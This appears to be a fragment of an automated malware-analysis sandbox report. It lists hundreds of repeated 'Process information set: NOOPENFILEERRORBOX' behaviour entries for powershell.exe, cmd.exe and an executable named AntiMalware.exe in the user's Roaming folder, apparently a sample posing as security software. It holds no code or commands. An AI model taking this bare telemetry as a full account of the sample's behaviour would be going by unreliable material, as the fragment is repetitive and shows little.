                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
